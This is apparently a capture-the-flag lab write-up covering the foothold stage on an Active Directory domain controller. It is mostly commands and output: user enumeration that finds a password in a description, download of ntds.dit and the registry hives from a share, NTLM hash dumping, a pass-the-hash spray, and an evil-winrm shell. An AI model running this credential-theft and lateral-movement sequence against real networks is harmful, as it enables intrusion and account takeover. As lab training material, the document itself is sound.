Foothold
$ netexec smb 192.168.170.175 -u '' -p '' --users
SMB 192.168.170.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB 192.168.170.175 445 RESOURCEDC [+] resourced.local\:
SMB 192.168.170.175 445 RESOURCEDC -Username- -Last PW Set- -BadPW- -Description-
SMB 192.168.170.175 445 RESOURCEDC Administrator 2022-02-11 17:21:20 0 Built-in account for administering the computer/domain
SMB 192.168.170.175 445 RESOURCEDC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 192.168.170.175 445 RESOURCEDC krbtgt 2021-10-01 11:08:53 0 Key Distribution Center Service Account
SMB 192.168.170.175 445 RESOURCEDC M.Mason 2021-10-01 11:14:51 0 Ex IT admin
SMB 192.168.170.175 445 RESOURCEDC K.Keen 2021-10-01 11:14:51 0 Frontend Developer
SMB 192.168.170.175 445 RESOURCEDC L.Livingstone 2021-10-01 11:14:51 0 SysAdmin
SMB 192.168.170.175 445 RESOURCEDC J.Johnson 2021-10-01 11:14:52 0 Networking specialist
SMB 192.168.170.175 445 RESOURCEDC V.Ventz 2021-10-01 11:14:52 0 New-hired, reminder: HotelCalifornia194!
SMB 192.168.170.175 445 RESOURCEDC S.Swanson 2021-10-01 11:14:52 0 Military Vet now cybersecurity specialist
SMB 192.168.170.175 445 RESOURCEDC P.Parker 2021-10-01 11:14:52 0 Backend Developer
SMB 192.168.170.175 445 RESOURCEDC R.Robinson 2021-10-01 11:14:52 0 Database Admin
SMB 192.168.170.175 445 RESOURCEDC D.Durant 2021-10-01 11:14:52 0 Linear Algebra and crypto god
SMB 192.168.170.175 445 RESOURCEDC G.Goldberg 2021-10-01 11:14:52 0 Blockchain expert
V.Ventz:HotelCalifornia194!$ netexec smb 192.168.170.175 -u V.Ventz -p 'HotelCalifornia194!' --shares
SMB 192.168.170.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB 192.168.170.175 445 RESOURCEDC [+] resourced.local\V.Ventz:HotelCalifornia194!
SMB 192.168.170.175 445 RESOURCEDC [*] Enumerated shares
SMB 192.168.170.175 445 RESOURCEDC Share Permissions Remark
SMB 192.168.170.175 445 RESOURCEDC ----- ----------- ------
SMB 192.168.170.175 445 RESOURCEDC ADMIN$ Remote Admin
SMB 192.168.170.175 445 RESOURCEDC C$ Default share
SMB 192.168.170.175 445 RESOURCEDC IPC$ READ Remote IPC
SMB 192.168.170.175 445 RESOURCEDC NETLOGON READ Logon server share
SMB 192.168.170.175 445 RESOURCEDC Password Audit READ
SMB 192.168.170.175 445 RESOURCEDC SYSVOL READ Logon server share
$ smbclient '\\192.168.170.175\Password Audit' -U V.Ventz%'HotelCalifornia194!'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Oct 5 03:49:16 2021
.. D 0 Tue Oct 5 03:49:16 2021
Active Directory D 0 Tue Oct 5 03:49:15 2021
registry D 0 Tue Oct 5 03:49:16 2021
7706623 blocks of size 4096. 2716813 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \Active Directory\ntds.dit of size 25165824 as Active Directory/ntds.dit (1707.3 KiloBytes/sec) (average 1707.3 KiloBytes/sec)
getting file \Active Directory\ntds.jfm of size 16384 as Active Directory/ntds.jfm (88.9 KiloBytes/sec) (average 1687.3 KiloBytes/sec)
getting file \registry\SECURITY of size 65536 as registry/SECURITY (355.6 KiloBytes/sec) (average 1671.0 KiloBytes/sec)
getting file \registry\SYSTEM of size 16777216 as registry/SYSTEM (3090.2 KiloBytes/sec) (average 2046.2 KiloBytes/sec)
smb: \> exit
$ cd Active\ Directory
$ mv ../registry/* .$ impacket-secretsdump -ntds ntds.dit -system SYSTEM -just-dc-ntlm local
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra
[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
[*] Cleaning up...
vi hashes.txt
$ cat hashes.txt | grep ::: | awk -F: '{print $1":"$4}'
Administrator:12579b1666d4ac10f0f59f300776495f
Guest:31d6cfe0d16ae931b73c59d7e0c089c0
RESOURCEDC$:9ddb6f4d9d01fedeb4bccfb09df1b39d
krbtgt:3004b16f88664fbebfcb9ed272b0565b
M.Mason:3105e0f6af52aba8e11d19f27e487e45
K.Keen:204410cc5a7147cd52a04ddae6754b0c
L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
J.Johnson:3e028552b946cc4f282b72879f63b726
V.Ventz:913c144caea1c0a936fd1ccb46929d3c
S.Swanson:bd7c11a9021d2708eda561984f3c8939
P.Parker:980910b8fc2e4fe9d482123301dd19fe
R.Robinson:fea5a148c14cf51590456b2102b29fac
D.Durant:08aca8ed17a9eec9fac4acdcb4652c35
G.Goldberg:62e16d17c3015c47b4d513e65ca757a2
$ hashcat --user -m 1000 old.ntlm ~/rockyou.txt -O$ cat old.ntlm | grep : | awk -F: '{print $2}'
12579b1666d4ac10f0f59f300776495f
31d6cfe0d16ae931b73c59d7e0c089c0
9ddb6f4d9d01fedeb4bccfb09df1b39d
3004b16f88664fbebfcb9ed272b0565b
3105e0f6af52aba8e11d19f27e487e45
204410cc5a7147cd52a04ddae6754b0c
19a3a7550ce8c505c2d46b5e39d6f808
3e028552b946cc4f282b72879f63b726
913c144caea1c0a936fd1ccb46929d3c
bd7c11a9021d2708eda561984f3c8939
980910b8fc2e4fe9d482123301dd19fe
fea5a148c14cf51590456b2102b29fac
08aca8ed17a9eec9fac4acdcb4652c35
62e16d17c3015c47b4d513e65ca757a2
$ netexec smb 192.168.170.175 -u users -H pth.ntlm --continue-on-success | grep "+"
L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808$ netexec rdp 192.168.170.175 -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808
RDP 192.168.170.175 3389 RESOURCEDC [*] Windows 10 or Windows Server 2016 Build 17763 (name:RESOURCEDC) (domain:resourced.local) (nla:True)
RDP 192.168.170.175 3389 RESOURCEDC [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 (Pwn3d!)
$ netexec winrm 192.168.170.175 -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808
WINRM 192.168.170.175 5985 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 (name:RESOURCEDC) (domain:resourced.local)
WINRM 192.168.170.175 5985 RESOURCEDC [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 (Pwn3d!)
$ evil-winrm -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808 -i 192.168.170.175
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> whoami; type C:\Users\L.Livingstone\Desktop\local.txt; ipconfig
resourced\l.livingstone
ff1cad90deba0636ad33387726786a5f
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.170.175
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.170.254
Last updated